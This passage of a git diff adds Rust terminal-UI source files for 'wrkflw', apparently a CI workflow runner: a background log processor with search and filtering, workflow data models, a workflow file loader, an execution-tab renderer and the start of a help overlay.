/// Convert to a table row for rendering
|
||||
pub fn to_row(&self) -> Row<'static> {
|
||||
Row::new(vec![
|
||||
Cell::from(self.timestamp.clone()),
|
||||
Cell::from(self.log_type.clone()).style(self.log_style),
|
||||
Cell::from(Line::from(self.content_spans.clone())),
|
||||
])
|
||||
}
|
||||
}
|
||||
|
||||
/// Request to update log processing parameters
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct LogProcessingRequest {
|
||||
pub search_query: String,
|
||||
pub filter_level: Option<LogFilterLevel>,
|
||||
pub app_logs: Vec<String>, // Complete app logs
|
||||
pub app_logs_count: usize, // To detect changes in app logs
|
||||
pub system_logs_count: usize, // To detect changes in system logs
|
||||
}
|
||||
|
||||
/// Response with processed logs
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct LogProcessingResponse {
|
||||
pub processed_logs: Vec<ProcessedLogEntry>,
|
||||
pub total_log_count: usize,
|
||||
pub filtered_count: usize,
|
||||
pub search_matches: Vec<usize>, // Indices of logs that match search
|
||||
}
|
||||
|
||||
/// Background log processor
|
||||
pub struct LogProcessor {
|
||||
request_tx: mpsc::Sender<LogProcessingRequest>,
|
||||
response_rx: mpsc::Receiver<LogProcessingResponse>,
|
||||
_worker_handle: thread::JoinHandle<()>,
|
||||
}
|
||||
|
||||
impl LogProcessor {
|
||||
/// Create a new log processor with a background worker thread
|
||||
pub fn new() -> Self {
|
||||
let (request_tx, request_rx) = mpsc::channel::<LogProcessingRequest>();
|
||||
let (response_tx, response_rx) = mpsc::channel::<LogProcessingResponse>();
|
||||
|
||||
let worker_handle = thread::spawn(move || {
|
||||
Self::worker_loop(request_rx, response_tx);
|
||||
});
|
||||
|
||||
Self {
|
||||
request_tx,
|
||||
response_rx,
|
||||
_worker_handle: worker_handle,
|
||||
}
|
||||
}
|
||||
|
||||
/// Send a processing request (non-blocking)
|
||||
pub fn request_update(
|
||||
&self,
|
||||
request: LogProcessingRequest,
|
||||
) -> Result<(), mpsc::SendError<LogProcessingRequest>> {
|
||||
self.request_tx.send(request)
|
||||
}
|
||||
|
||||
/// Try to get the latest processed logs (non-blocking)
|
||||
pub fn try_get_update(&self) -> Option<LogProcessingResponse> {
|
||||
self.response_rx.try_recv().ok()
|
||||
}
|
||||
|
||||
/// Background worker loop
|
||||
fn worker_loop(
|
||||
request_rx: mpsc::Receiver<LogProcessingRequest>,
|
||||
response_tx: mpsc::Sender<LogProcessingResponse>,
|
||||
) {
|
||||
let mut last_request: Option<LogProcessingRequest> = None;
|
||||
let mut last_processed_time = Instant::now();
|
||||
let mut cached_logs: Vec<String> = Vec::new();
|
||||
let mut cached_app_logs_count = 0;
|
||||
let mut cached_system_logs_count = 0;
|
||||
|
||||
loop {
|
||||
// Check for new requests with a timeout to allow periodic processing
|
||||
let request = match request_rx.recv_timeout(Duration::from_millis(100)) {
|
||||
Ok(req) => Some(req),
|
||||
Err(mpsc::RecvTimeoutError::Timeout) => None,
|
||||
Err(mpsc::RecvTimeoutError::Disconnected) => break,
|
||||
};
|
||||
|
||||
// Update request if we received one
|
||||
if let Some(req) = request {
|
||||
last_request = Some(req);
|
||||
}
|
||||
|
||||
// Process if we have a request and enough time has passed since last processing
|
||||
if let Some(ref req) = last_request {
|
||||
let should_process = last_processed_time.elapsed() > Duration::from_millis(50)
|
||||
&& (cached_app_logs_count != req.app_logs_count
|
||||
|| cached_system_logs_count != req.system_logs_count
|
||||
|| cached_logs.is_empty());
|
||||
|
||||
if should_process {
|
||||
// Refresh log cache if log counts changed
|
||||
if cached_app_logs_count != req.app_logs_count
|
||||
|| cached_system_logs_count != req.system_logs_count
|
||||
|| cached_logs.is_empty()
|
||||
{
|
||||
cached_logs = Self::get_combined_logs(&req.app_logs);
|
||||
cached_app_logs_count = req.app_logs_count;
|
||||
cached_system_logs_count = req.system_logs_count;
|
||||
}
|
||||
|
||||
let response = Self::process_logs(&cached_logs, req);
|
||||
|
||||
if response_tx.send(response).is_err() {
|
||||
break; // Receiver disconnected
|
||||
}
|
||||
|
||||
last_processed_time = Instant::now();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Get combined app and system logs
|
||||
fn get_combined_logs(app_logs: &[String]) -> Vec<String> {
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Add app logs
|
||||
for log in app_logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Add system logs
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
all_logs
|
||||
}
|
||||
|
||||
/// Process logs according to search and filter criteria
|
||||
fn process_logs(all_logs: &[String], request: &LogProcessingRequest) -> LogProcessingResponse {
|
||||
// Filter logs based on search query and filter level
|
||||
let mut filtered_logs = Vec::new();
|
||||
let mut search_matches = Vec::new();
|
||||
|
||||
for (idx, log) in all_logs.iter().enumerate() {
|
||||
let passes_filter = match &request.filter_level {
|
||||
None => true,
|
||||
Some(level) => level.matches(log),
|
||||
};
|
||||
|
||||
let matches_search = if request.search_query.is_empty() {
|
||||
true
|
||||
} else {
|
||||
log.to_lowercase()
|
||||
.contains(&request.search_query.to_lowercase())
|
||||
};
|
||||
|
||||
if passes_filter && matches_search {
|
||||
filtered_logs.push((idx, log));
|
||||
if matches_search && !request.search_query.is_empty() {
|
||||
search_matches.push(filtered_logs.len() - 1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Process filtered logs into display format
|
||||
let processed_logs: Vec<ProcessedLogEntry> = filtered_logs
|
||||
.iter()
|
||||
.map(|(_, log_line)| Self::process_log_entry(log_line, &request.search_query))
|
||||
.collect();
|
||||
|
||||
LogProcessingResponse {
|
||||
processed_logs,
|
||||
total_log_count: all_logs.len(),
|
||||
filtered_count: filtered_logs.len(),
|
||||
search_matches,
|
||||
}
|
||||
}
|
||||
|
||||
/// Process a single log entry into display format
|
||||
fn process_log_entry(log_line: &str, search_query: &str) -> ProcessedLogEntry {
|
||||
// Extract timestamp from log format [HH:MM:SS]
|
||||
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let end = log_line.find(']').unwrap_or(0);
|
||||
if end > 1 {
|
||||
log_line[1..end].to_string()
|
||||
} else {
|
||||
"??:??:??".to_string()
|
||||
}
|
||||
} else {
|
||||
"??:??:??".to_string()
|
||||
};
|
||||
|
||||
// Determine log type and style
|
||||
let (log_type, log_style) =
|
||||
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
|
||||
{
|
||||
("ERROR", Style::default().fg(Color::Red))
|
||||
} else if log_line.contains("Warning")
|
||||
|| log_line.contains("warning")
|
||||
|| log_line.contains("⚠️")
|
||||
{
|
||||
("WARN", Style::default().fg(Color::Yellow))
|
||||
} else if log_line.contains("Success")
|
||||
|| log_line.contains("success")
|
||||
|| log_line.contains("✅")
|
||||
{
|
||||
("SUCCESS", Style::default().fg(Color::Green))
|
||||
} else if log_line.contains("Running")
|
||||
|| log_line.contains("running")
|
||||
|| log_line.contains("⟳")
|
||||
{
|
||||
("INFO", Style::default().fg(Color::Cyan))
|
||||
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
|
||||
("TRIG", Style::default().fg(Color::Magenta))
|
||||
} else {
|
||||
("INFO", Style::default().fg(Color::Gray))
|
||||
};
|
||||
|
||||
// Extract content after timestamp
|
||||
let content = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let start = log_line.find(']').unwrap_or(0) + 1;
|
||||
log_line[start..].trim()
|
||||
} else {
|
||||
log_line
|
||||
};
|
||||
|
||||
// Create content spans with search highlighting
|
||||
let content_spans = if !search_query.is_empty() {
|
||||
Self::highlight_search_matches(content, search_query)
|
||||
} else {
|
||||
vec![Span::raw(content.to_string())]
|
||||
};
|
||||
|
||||
ProcessedLogEntry {
|
||||
timestamp,
|
||||
log_type: log_type.to_string(),
|
||||
log_style,
|
||||
content_spans,
|
||||
}
|
||||
}
|
||||
|
||||
/// Highlight search matches in content
|
||||
fn highlight_search_matches(content: &str, search_query: &str) -> Vec<Span<'static>> {
|
||||
let mut spans = Vec::new();
|
||||
let lowercase_content = content.to_lowercase();
|
||||
let lowercase_query = search_query.to_lowercase();
|
||||
|
||||
if lowercase_content.contains(&lowercase_query) {
|
||||
let mut last_idx = 0;
|
||||
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
|
||||
let real_idx = last_idx + idx;
|
||||
|
||||
// Add text before match
|
||||
if real_idx > last_idx {
|
||||
spans.push(Span::raw(content[last_idx..real_idx].to_string()));
|
||||
}
|
||||
|
||||
// Add matched text with highlight
|
||||
let match_end = real_idx + search_query.len();
|
||||
spans.push(Span::styled(
|
||||
content[real_idx..match_end].to_string(),
|
||||
Style::default().bg(Color::Yellow).fg(Color::Black),
|
||||
));
|
||||
|
||||
last_idx = match_end;
|
||||
}
|
||||
|
||||
// Add remaining text after last match
|
||||
if last_idx < content.len() {
|
||||
spans.push(Span::raw(content[last_idx..].to_string()));
|
||||
}
|
||||
} else {
|
||||
spans.push(Span::raw(content.to_string()));
|
||||
}
|
||||
|
||||
spans
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for LogProcessor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
100
crates/ui/src/models/mod.rs
Normal file
100
crates/ui/src/models/mod.rs
Normal file
@@ -0,0 +1,100 @@
|
||||
// UI Models for wrkflw
|
||||
use chrono::Local;
|
||||
use std::path::PathBuf;
|
||||
use wrkflw_executor::{JobStatus, StepStatus};
|
||||
|
||||
/// Type alias for the complex execution result type
|
||||
pub type ExecutionResultMsg = (usize, Result<(Vec<wrkflw_executor::JobResult>, ()), String>);
|
||||
|
||||
/// Represents an individual workflow file
|
||||
pub struct Workflow {
|
||||
pub name: String,
|
||||
pub path: PathBuf,
|
||||
pub selected: bool,
|
||||
pub status: WorkflowStatus,
|
||||
pub execution_details: Option<WorkflowExecution>,
|
||||
}
|
||||
|
||||
/// Status of a workflow
|
||||
#[derive(Debug, Clone, PartialEq)]
|
||||
pub enum WorkflowStatus {
|
||||
NotStarted,
|
||||
Running,
|
||||
Success,
|
||||
Failed,
|
||||
Skipped,
|
||||
}
|
||||
|
||||
/// Detailed execution information
|
||||
pub struct WorkflowExecution {
|
||||
pub jobs: Vec<JobExecution>,
|
||||
pub start_time: chrono::DateTime<Local>,
|
||||
pub end_time: Option<chrono::DateTime<Local>>,
|
||||
pub logs: Vec<String>,
|
||||
pub progress: f64, // 0.0 - 1.0 for progress bar
|
||||
}
|
||||
|
||||
/// Job execution details
|
||||
pub struct JobExecution {
|
||||
pub name: String,
|
||||
pub status: JobStatus,
|
||||
pub steps: Vec<StepExecution>,
|
||||
pub logs: Vec<String>,
|
||||
}
|
||||
|
||||
/// Step execution details
|
||||
pub struct StepExecution {
|
||||
pub name: String,
|
||||
pub status: StepStatus,
|
||||
pub output: String,
|
||||
}
|
||||
|
||||
/// Log filter levels
|
||||
#[derive(Debug, Clone, PartialEq)]
|
||||
pub enum LogFilterLevel {
|
||||
Info,
|
||||
Warning,
|
||||
Error,
|
||||
Success,
|
||||
Trigger,
|
||||
All,
|
||||
}
|
||||
|
||||
impl LogFilterLevel {
|
||||
pub fn matches(&self, log: &str) -> bool {
|
||||
match self {
|
||||
LogFilterLevel::Info => {
|
||||
log.contains("ℹ️") || (log.contains("INFO") && !log.contains("SUCCESS"))
|
||||
}
|
||||
LogFilterLevel::Warning => log.contains("⚠️") || log.contains("WARN"),
|
||||
LogFilterLevel::Error => log.contains("❌") || log.contains("ERROR"),
|
||||
LogFilterLevel::Success => log.contains("SUCCESS") || log.contains("success"),
|
||||
LogFilterLevel::Trigger => {
|
||||
log.contains("Triggering") || log.contains("triggered") || log.contains("TRIG")
|
||||
}
|
||||
LogFilterLevel::All => true,
|
||||
}
|
||||
}
|
||||
|
||||
pub fn next(&self) -> Self {
|
||||
match self {
|
||||
LogFilterLevel::All => LogFilterLevel::Info,
|
||||
LogFilterLevel::Info => LogFilterLevel::Warning,
|
||||
LogFilterLevel::Warning => LogFilterLevel::Error,
|
||||
LogFilterLevel::Error => LogFilterLevel::Success,
|
||||
LogFilterLevel::Success => LogFilterLevel::Trigger,
|
||||
LogFilterLevel::Trigger => LogFilterLevel::All,
|
||||
}
|
||||
}
|
||||
|
||||
pub fn to_string(&self) -> &str {
|
||||
match self {
|
||||
LogFilterLevel::All => "ALL",
|
||||
LogFilterLevel::Info => "INFO",
|
||||
LogFilterLevel::Warning => "WARNING",
|
||||
LogFilterLevel::Error => "ERROR",
|
||||
LogFilterLevel::Success => "SUCCESS",
|
||||
LogFilterLevel::Trigger => "TRIGGER",
|
||||
}
|
||||
}
|
||||
}
|
||||
53
crates/ui/src/utils/mod.rs
Normal file
53
crates/ui/src/utils/mod.rs
Normal file
@@ -0,0 +1,53 @@
|
||||
// UI utilities
|
||||
use crate::models::{Workflow, WorkflowStatus};
|
||||
use std::path::{Path, PathBuf};
|
||||
use wrkflw_utils::is_workflow_file;
|
||||
|
||||
/// Find and load all workflow files in a directory
|
||||
pub fn load_workflows(dir_path: &Path) -> Vec<Workflow> {
|
||||
let mut workflows = Vec::new();
|
||||
|
||||
// Default path is .github/workflows
|
||||
let default_workflows_dir = Path::new(".github").join("workflows");
|
||||
let is_default_dir = dir_path == default_workflows_dir || dir_path.ends_with("workflows");
|
||||
|
||||
if let Ok(entries) = std::fs::read_dir(dir_path) {
|
||||
for entry in entries.flatten() {
|
||||
let path = entry.path();
|
||||
if path.is_file() && (is_workflow_file(&path) || !is_default_dir) {
|
||||
// Get just the base name without extension
|
||||
let name = path.file_stem().map_or_else(
|
||||
|| "[unknown]".to_string(),
|
||||
|fname| fname.to_string_lossy().into_owned(),
|
||||
);
|
||||
|
||||
workflows.push(Workflow {
|
||||
name,
|
||||
path,
|
||||
selected: false,
|
||||
status: WorkflowStatus::NotStarted,
|
||||
execution_details: None,
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check for GitLab CI pipeline file in the root directory if we're in the default GitHub workflows dir
|
||||
if is_default_dir {
|
||||
// Look for .gitlab-ci.yml in the repository root
|
||||
let gitlab_ci_path = PathBuf::from(".gitlab-ci.yml");
|
||||
if gitlab_ci_path.exists() && gitlab_ci_path.is_file() {
|
||||
workflows.push(Workflow {
|
||||
name: "gitlab-ci".to_string(),
|
||||
path: gitlab_ci_path,
|
||||
selected: false,
|
||||
status: WorkflowStatus::NotStarted,
|
||||
execution_details: None,
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
// Sort workflows by name
|
||||
workflows.sort_by(|a, b| a.name.cmp(&b.name));
|
||||
workflows
|
||||
}
|
||||
361
crates/ui/src/views/execution_tab.rs
Normal file
361
crates/ui/src/views/execution_tab.rs
Normal file
@@ -0,0 +1,361 @@
|
||||
// Execution tab rendering
|
||||
use crate::app::App;
|
||||
use crate::models::WorkflowStatus;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Gauge, List, ListItem, Paragraph},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the execution tab
|
||||
pub fn render_execution_tab(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
app: &mut App,
|
||||
area: Rect,
|
||||
) {
|
||||
// Get the workflow index either from current_execution or selected workflow
|
||||
let current_workflow_idx = app
|
||||
.current_execution
|
||||
.or_else(|| app.workflow_list_state.selected())
|
||||
.filter(|&idx| idx < app.workflows.len());
|
||||
|
||||
if let Some(idx) = current_workflow_idx {
|
||||
let workflow = &app.workflows[idx];
|
||||
|
||||
// Split the area into sections
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Vertical)
|
||||
.constraints(
|
||||
[
|
||||
Constraint::Length(5), // Workflow info with progress bar
|
||||
Constraint::Min(5), // Jobs list or Remote execution info
|
||||
Constraint::Length(7), // Execution info
|
||||
]
|
||||
.as_ref(),
|
||||
)
|
||||
.margin(1)
|
||||
.split(area);
|
||||
|
||||
// Workflow info section
|
||||
let status_text = match workflow.status {
|
||||
WorkflowStatus::NotStarted => "Not Started",
|
||||
WorkflowStatus::Running => "Running",
|
||||
WorkflowStatus::Success => "Success",
|
||||
WorkflowStatus::Failed => "Failed",
|
||||
WorkflowStatus::Skipped => "Skipped",
|
||||
};
|
||||
|
||||
let status_style = match workflow.status {
|
||||
WorkflowStatus::NotStarted => Style::default().fg(Color::Gray),
|
||||
WorkflowStatus::Running => Style::default().fg(Color::Cyan),
|
||||
WorkflowStatus::Success => Style::default().fg(Color::Green),
|
||||
WorkflowStatus::Failed => Style::default().fg(Color::Red),
|
||||
WorkflowStatus::Skipped => Style::default().fg(Color::Yellow),
|
||||
};
|
||||
|
||||
let mut workflow_info = vec![
|
||||
Line::from(vec![
|
||||
Span::styled("Workflow: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
workflow.name.clone(),
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled("Status: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(status_text, status_style),
|
||||
]),
|
||||
];
|
||||
|
||||
// Add progress bar for running workflows or workflows with execution details
|
||||
if let Some(execution) = &workflow.execution_details {
|
||||
// Calculate progress
|
||||
let progress = execution.progress;
|
||||
|
||||
// Add progress bar
|
||||
let gauge_color = match workflow.status {
|
||||
WorkflowStatus::Running => Color::Cyan,
|
||||
WorkflowStatus::Success => Color::Green,
|
||||
WorkflowStatus::Failed => Color::Red,
|
||||
_ => Color::Gray,
|
||||
};
|
||||
|
||||
let progress_text = match workflow.status {
|
||||
WorkflowStatus::Running => format!("{:.0}%", progress * 100.0),
|
||||
WorkflowStatus::Success => "Completed".to_string(),
|
||||
WorkflowStatus::Failed => "Failed".to_string(),
|
||||
_ => "Not started".to_string(),
|
||||
};
|
||||
|
||||
// Add empty line before progress bar
|
||||
workflow_info.push(Line::from(""));
|
||||
|
||||
// Add the gauge widget to the paragraph data
|
||||
workflow_info.push(Line::from(vec![Span::styled(
|
||||
format!("Progress: {}", progress_text),
|
||||
Style::default().fg(Color::Blue),
|
||||
)]));
|
||||
|
||||
let gauge = Gauge::default()
|
||||
.block(Block::default())
|
||||
.gauge_style(Style::default().fg(gauge_color).bg(Color::Black))
|
||||
.percent((progress * 100.0) as u16);
|
||||
|
||||
// Render gauge separately after the paragraph
|
||||
let workflow_info_widget = Paragraph::new(workflow_info).block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Workflow Information ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
);
|
||||
|
||||
let gauge_area = Rect {
|
||||
x: chunks[0].x + 2,
|
||||
y: chunks[0].y + 4,
|
||||
width: chunks[0].width - 4,
|
||||
height: 1,
|
||||
};
|
||||
|
||||
f.render_widget(workflow_info_widget, chunks[0]);
|
||||
f.render_widget(gauge, gauge_area);
|
||||
|
||||
// Jobs list section
|
||||
if execution.jobs.is_empty() {
|
||||
let placeholder = Paragraph::new("No jobs have started execution yet...")
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Jobs ", Style::default().fg(Color::Yellow))),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
f.render_widget(placeholder, chunks[1]);
|
||||
} else {
|
||||
let job_items: Vec<ListItem> = execution
|
||||
.jobs
|
||||
.iter()
|
||||
.map(|job| {
|
||||
let status_symbol = match job.status {
|
||||
wrkflw_executor::JobStatus::Success => "✅",
|
||||
wrkflw_executor::JobStatus::Failure => "❌",
|
||||
wrkflw_executor::JobStatus::Skipped => "⏭",
|
||||
};
|
||||
|
||||
let status_style = match job.status {
|
||||
wrkflw_executor::JobStatus::Success => {
|
||||
Style::default().fg(Color::Green)
|
||||
}
|
||||
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
|
||||
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
|
||||
};
|
||||
|
||||
// Count completed and total steps
|
||||
let total_steps = job.steps.len();
|
||||
let completed_steps = job
|
||||
.steps
|
||||
.iter()
|
||||
.filter(|s| {
|
||||
s.status == wrkflw_executor::StepStatus::Success
|
||||
|| s.status == wrkflw_executor::StepStatus::Failure
|
||||
})
|
||||
.count();
|
||||
|
||||
let steps_info = format!("[{}/{}]", completed_steps, total_steps);
|
||||
|
||||
ListItem::new(Line::from(vec![
|
||||
Span::styled(status_symbol, status_style),
|
||||
Span::raw(" "),
|
||||
Span::styled(&job.name, Style::default().fg(Color::White)),
|
||||
Span::raw(" "),
|
||||
Span::styled(steps_info, Style::default().fg(Color::DarkGray)),
|
||||
]))
|
||||
})
|
||||
.collect();
|
||||
|
||||
let jobs_list = List::new(job_items)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Jobs ", Style::default().fg(Color::Yellow))),
|
||||
)
|
||||
.highlight_style(
|
||||
Style::default()
|
||||
.bg(Color::DarkGray)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)
|
||||
.highlight_symbol("» ");
|
||||
|
||||
f.render_stateful_widget(jobs_list, chunks[1], &mut app.job_list_state);
|
||||
}
|
||||
|
||||
// Execution info section
|
||||
let mut execution_info = Vec::new();
|
||||
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Started: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
execution.start_time.format("%Y-%m-%d %H:%M:%S").to_string(),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]));
|
||||
|
||||
if let Some(end_time) = execution.end_time {
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Finished: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
end_time.format("%Y-%m-%d %H:%M:%S").to_string(),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]));
|
||||
|
||||
// Calculate duration
|
||||
let duration = end_time.signed_duration_since(execution.start_time);
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Duration: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
format!(
|
||||
"{}m {}s",
|
||||
duration.num_minutes(),
|
||||
duration.num_seconds() % 60
|
||||
),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]));
|
||||
} else {
|
||||
// Show running time for active workflows
|
||||
let current_time = chrono::Local::now();
|
||||
let running_time = current_time.signed_duration_since(execution.start_time);
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Running for: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
format!(
|
||||
"{}m {}s",
|
||||
running_time.num_minutes(),
|
||||
running_time.num_seconds() % 60
|
||||
),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]));
|
||||
}
|
||||
|
||||
// Add hint for Enter key to see details
|
||||
execution_info.push(Line::from(""));
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Press ", Style::default().fg(Color::DarkGray)),
|
||||
Span::styled("Enter", Style::default().fg(Color::Yellow)),
|
||||
Span::styled(" to view job details", Style::default().fg(Color::DarkGray)),
|
||||
]));
|
||||
|
||||
let info_widget = Paragraph::new(execution_info).block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Execution Information ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
);
|
||||
|
||||
f.render_widget(info_widget, chunks[2]);
|
||||
} else {
|
||||
// No workflow execution to display
|
||||
let workflow_info_widget = Paragraph::new(workflow_info).block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Workflow Information ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
);
|
||||
|
||||
f.render_widget(workflow_info_widget, chunks[0]);
|
||||
|
||||
// No execution details to display
|
||||
let placeholder = Paragraph::new(vec![
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"No execution data available.",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(""),
|
||||
Line::from("Press 'Enter' to run this workflow."),
|
||||
Line::from(""),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Jobs ", Style::default().fg(Color::Yellow))),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(placeholder, chunks[1]);
|
||||
|
||||
// Execution information
|
||||
let info_widget = Paragraph::new(vec![
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"No execution has been started.",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)]),
|
||||
Line::from(""),
|
||||
Line::from("Press 'Enter' in the Workflows tab to run,"),
|
||||
Line::from("or 't' to trigger on GitHub."),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Execution Information ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(info_widget, chunks[2]);
|
||||
}
|
||||
} else {
|
||||
// No workflow execution to display
|
||||
let placeholder = Paragraph::new(vec![
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"No workflow execution data available.",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(""),
|
||||
Line::from("Select workflows in the Workflows tab and press 'r' to run them."),
|
||||
Line::from(""),
|
||||
Line::from("Or press Enter on a selected workflow to run it directly."),
|
||||
Line::from(""),
|
||||
Line::from("You can also press 't' to trigger a workflow on GitHub remotely."),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Execution ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(placeholder, area);
|
||||
}
|
||||
}
|
||||
458
crates/ui/src/views/help_overlay.rs
Normal file
458
crates/ui/src/views/help_overlay.rs
Normal file
@@ -0,0 +1,458 @@
|
||||
// Help overlay rendering
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Paragraph, Wrap},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the help tab with scroll support
|
||||
pub fn render_help_content(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
area: Rect,
|
||||
scroll_offset: usize,
|
||||
) {
|
||||
// Split the area into columns for better organization
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Horizontal)
|
||||
.constraints([Constraint::Percentage(50), Constraint::Percentage(50)].as_ref())
|
||||
.split(area);
|
||||
|
||||
// Left column content
|
||||
let left_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"🗂 NAVIGATION",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Tab / Shift+Tab",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Switch between tabs"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1-4 / w,x,l,h",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Jump to specific tab"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓ or k/j",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Navigate lists"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Enter",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select/View details"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Esc",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Back/Exit help"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🚀 WORKFLOW MANAGEMENT",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Space",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle workflow selection"),
|
||||
]),
|
||||
